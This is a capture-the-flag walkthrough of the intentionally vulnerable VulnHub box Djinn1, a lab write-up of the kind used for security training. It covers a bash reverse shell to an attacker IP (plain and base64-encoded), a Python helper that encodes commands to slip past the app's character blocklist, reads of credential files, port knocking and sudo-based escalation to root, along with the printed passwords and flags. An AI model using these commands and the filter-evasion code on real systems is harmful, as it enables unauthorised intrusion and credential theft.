VulnHub: Djinn1 Walkthrough

Djinn 1 is another intentionally vulnerable box in the Djinn series on VulnHub, by 0xmzfr.
Enumeration
Starting enumeration with AutoRecon.
Nmap scan report for 192.168.50.150
Host is up, received arp-response (0.0012s latency).
Scanned at 2021-12-30 06:44:55 EST for 14s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp filtered ssh port-unreach ttl 64
1337/tcp open waste? syn-ack ttl 64
7331/tcp open http syn-ack ttl 64 Werkzeug httpd 0.16.0 (Python 2.7.15+)
FTP allows anonymous login. Port 22 is filtered, and the port-unreach reason means something is actively rejecting it rather than silently dropping; quite possibly port knocking is involved.
Port 1337 has an unidentified service, and a web server (Werkzeug 0.16.0 on Python 2.7) is listening on port 7331.
Noting the service versions, we move ahead.
Logging in as anonymous, we find three files:
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
┌──(root💀kali)-[~]
└─# cat creds.txt
nitu:81299
┌──(root💀kali)-[~]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
┌──(root💀kali)-[~]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
We now have a username and a credential (nitu:81299), and a hint that port 1337 hosts a game.
Moving onto port 1337:
┌──(root💀kali)-[~]
└─# nc 192.168.50.150 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '*', 5)
> 45
(2, '*', 9)
> 18
(1, '-', 9)
> -8
(8, '+', 1)
> 9
(3, '+', 9)
> 12
There is an actual game, but it only pays out after 1000 correct answers, and we don't know what the reward is. Since every question is printed as a Python tuple, a small script could answer them all; we'll leave that for now.
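Scripting the game is straightforward because each question arrives as a Python-style tuple. The client below is an added example written for this walkthrough, not code from the original post or from the box; it assumes the prompt format seen in the transcript above and only the three operators that appeared there (anything else raises a KeyError instead of returning a wrong answer), and it returns whatever the service prints after the last answer, since the page never shows the prize.

```python
import ast
import operator
import re
import socket

# Operators observed in the transcript; an unseen operator raises KeyError
# in solve_round rather than producing a silently wrong answer.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}

# One question exactly as the game prints it: (a, 'op', b)
QUESTION_RE = re.compile(r"\(\s*-?\d+\s*,\s*'([-+*/])'\s*,\s*-?\d+\s*\)")


def solve_round(question):
    """Turn "(9, '*', 5)" into the answer string "45"."""
    a, op, b = ast.literal_eval(question.strip())
    return str(OPS[op](a, b))


def find_questions(text):
    """Return (questions, end): every complete tuple in text, in order, and the
    offset just past the last one (0 if none). The ASCII-art banner contains
    "(_)" without digits, so it never matches."""
    matches = list(QUESTION_RE.finditer(text))
    if not matches:
        return [], 0
    return [m.group(0) for m in matches], matches[-1].end()


def play(host, port=1337, rounds=1000, timeout=10):
    """Answer `rounds` questions and return (answered, trailing_output).

    The prompt "> " has no trailing newline, so line-based reading would
    block; instead we buffer raw recv() data and regex out complete tuples."""
    answered = 0
    buf = ""
    with socket.create_connection((host, port), timeout=timeout) as s:
        while answered < rounds:
            chunk = s.recv(4096)
            if not chunk:
                break                        # server closed early
            buf += chunk.decode(errors="replace")
            questions, end = find_questions(buf)
            for q in questions:
                if answered >= rounds:
                    break
                s.sendall((solve_round(q) + "\n").encode())
                answered += 1
            buf = buf[end:]                  # keep only the unanswered tail
        tail = buf
        try:
            while True:                      # collect the gift, if any
                chunk = s.recv(4096)
                if not chunk:
                    break
                tail += chunk.decode(errors="replace")
        except socket.timeout:
            pass
    return answered, tail


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.50.150"
    n, gift = play(target)
    print(f"answered {n} questions")
    print(gift)
```

Run it as `python3 game.py 192.168.50.150`; the regex-on-buffer approach matters because the game's `> ` prompt never sends a newline, so `readline()` would hang forever.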
So, we move onto port 7331.
Nothing special on the first page, nor in its source code, so we dirbust.
200 41l 91w 1676c http://192.168.50.150:7331/genie
200 21l 43w 385c http://192.168.50.150:7331/wish
This is interesting! /genie returns HTTP 403, while /wish presents a command-execution form whose output is redirected to /genie.

Initial Foothold
netcat is present on the system, so we can try for a reverse shell.

Trying nc -e /bin/bash 192.168.50.129 443 through the form throws an error.

The same error appears with bash and python one-liners, so the form evidently rejects certain characters and symbols.
We can get around that by base64-encoding the command and decoding it again on the target.
We take the following bash one-liner and base64-encode it:
bash -i >& /dev/tcp/192.168.50.129/443 0>&1
We then submit the following command:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS80NDMgMD4mMQ== | base64 -d | bash
This decodes the base64 back to the original text and pipes it into bash; the submitted line itself contains none of the rejected characters.
Set up a listener on port 443, hit execute, and we receive a shell back.
┌──(root💀kali)-[~]
└─# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.150] 36924
bash: cannot set terminal process group (659): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
There is a file in the current working directory called app.py containing something interesting.
www-data@djinn:/opt/80$ ls
ls
app.py
app.pyc
static
templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
--snip--
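The reason the plain nc, bash and python one-liners failed is visible in app.py: RCE is a substring blocklist, and a reverse shell needs at least "/" and ".". The helper below is an added example for this walkthrough, not the box's own code. It assumes the app does plain substring matching against that list, and it covers a case the page does not hit: base64 output can itself contain "/" (whenever a "?" or 0x7F byte lands third in a 3-byte group), which the blocklist would also catch. Trailing padding cannot fix that because earlier groups stay the same, so the helper prepends spaces, which shift the alignment and which bash ignores.

```python
import base64

# Blocklist exactly as it appears in /opt/80/app.py above.
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def blocked_tokens(cmd, blocklist=RCE):
    """Blocklist entries found in cmd (empty list means the filter passes it).
    Assumes the app checks by plain substring, as the list suggests."""
    return [t for t in blocklist if t in cmd]


def b64_wrap(cmd, blocklist=RCE, max_pad=32):
    """Build an 'echo <b64> | base64 -d | bash' line free of blocked tokens.

    If the encoding contains a blocked character (typically '/'), prepend one
    more leading space to cmd and re-encode: leading whitespace changes the
    base64 alignment but not what bash executes."""
    for pad in range(max_pad):
        blob = base64.b64encode((" " * pad + cmd).encode()).decode()
        line = f"echo {blob} | base64 -d | bash"
        if not blocked_tokens(line, blocklist):
            return line
    raise ValueError("no clean encoding found within max_pad leading spaces")


if __name__ == "__main__":
    shell = "bash -i >& /dev/tcp/192.168.50.129/443 0>&1"
    print("blocked in the raw command:", blocked_tokens(shell))
    print(b64_wrap(shell))
```

For the reverse shell used above no padding is needed and the output is the exact line submitted to /wish; the constructed input `ab?` shows the other branch, where the straight encoding `YWI/` would have been rejected.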
The CREDS path in app.py points at /home/nitish/.dev/creds.txt, and reading it gives us nitish's password.
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
We also saw that port 22 was filtered; that is port knocking at work. The sequence lives in /etc/knockd.conf, so we'll read it from there and open the port.
www-data@djinn:/home/nitish/.dev$ cat /etc/knockd.conf
cat /etc/knockd.conf
[options]
UseSyslog
[openSSH]
sequence = 1356, 6784, 3409
seq_timeout = 5
command = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 3409, 6784, 1356
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
Using the knock utility on Linux, we send the open sequence and confirm with nmap.
┌──(root💀kali)-[~]
└─# knock 192.168.50.150 1356 6784 3409
┌──(root💀kali)-[~]
└─# nmap 192.168.50.150 -p 22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 16:49 EST
Nmap scan report for 192.168.50.150
Host is up (0.015s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:BE:BF:E6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
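The knock-then-verify step can also be done with plain sockets instead of the knock utility. The script below is an added example, not from the original post; it assumes the [openSSH] sequence from the knockd.conf above and that the target is reachable. Each connect attempt emits the SYN that the config's tcpflags = syn rule watches for, so the three ports need no listener and a refused connection still counts; the only constraint is that all three SYNs arrive within seq_timeout (5 seconds).

```python
import socket
import time

# Sequence copied from the [openSSH] stanza of /etc/knockd.conf above.
OPEN_SSH = [1356, 6784, 3409]


def knock(host, sequence, delay=0.3, timeout=1.0):
    """Send one TCP SYN per port in order; return [(port, connect_ex code)].

    knockd only needs the SYN, so a refused connection (ECONNREFUSED) is the
    expected outcome. The delay keeps the whole sequence well inside
    seq_timeout while still spacing the SYNs out."""
    results = []
    for port in sequence:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                rc = s.connect_ex((host, port))
            except OSError:
                rc = -1  # timeout or unreachable: the SYN still went out
        results.append((port, rc))
        time.sleep(delay)
    return results


def port_open(host, port, timeout=2.0):
    """True only if a full TCP handshake to host:port completes."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            return s.connect_ex((host, port)) == 0
        except OSError:
            return False


def open_ssh(host, sequence=OPEN_SSH):
    """Knock, then report whether 22/tcp now accepts connections."""
    knock(host, sequence)
    return port_open(host, 22)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.50.150"
    print("22/tcp open after knock:", open_ssh(target))
```

Because the iptables rule knockd inserts is keyed on %IP%, the verification must come from the same source address that knocked; checking from another host will still show the port filtered.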
Port 22 is open. We'll try the nitish creds that were found.
┌──(root💀kali)-[~]
└─# ssh nitish@192.168.50.150
The authenticity of host '192.168.50.150 (192.168.50.150)' can't be established.
ECDSA key fingerprint is SHA256:v2iGR6/ExHheYxy8lYISh+VaSM3sBf3DLY5MGWRpIu4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
--snip--
Last login: Thu Nov 14 20:32:20 2019 from 192.168.1.107
nitish@djinn:~$
We have a shell as nitish.
nitish@djinn:~$ ls
user.txt
nitish@djinn:~$ cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$
Here's our user flag.
Lateral Movement
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
We can run genie as user sam without needing the password.
nitish@djinn:~$ sudo -u sam /usr/bin/genie wish
Pass your wish to GOD, he might be able to help you.
nitish@djinn:~$ sudo -u sam /usr/bin/genie -g wish
We've added your wish to our records.
Continue praying!!
nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd new
my man!!
$ whoami
sam
After a bit of trial and error with genie's options, the -cmd flag hands us a shell as sam.
Privilege Escalation
$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
We can run /root/lago as root without a password.
$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# whoami
root
Options 1, 3 and 4 print hardcoded output; only option 2 actually reads input. Feeding it something that is not a number (num) where it expects one breaks the script and drops us into a root shell.
# cat proof.sh
#!/bin/bash
clear
figlet Amazing!!!
echo djinn pwned...
echo __________________________________________________________________________
echo
echo "Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc"
echo Path: $(pwd)
echo Date: $(date)
echo Whoami: $(whoami)
echo __________________________________________________________________________
echo
echo "By @0xmzfr"
echo ""
echo "Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)"
And here's our root flag too.
Thanks for reading.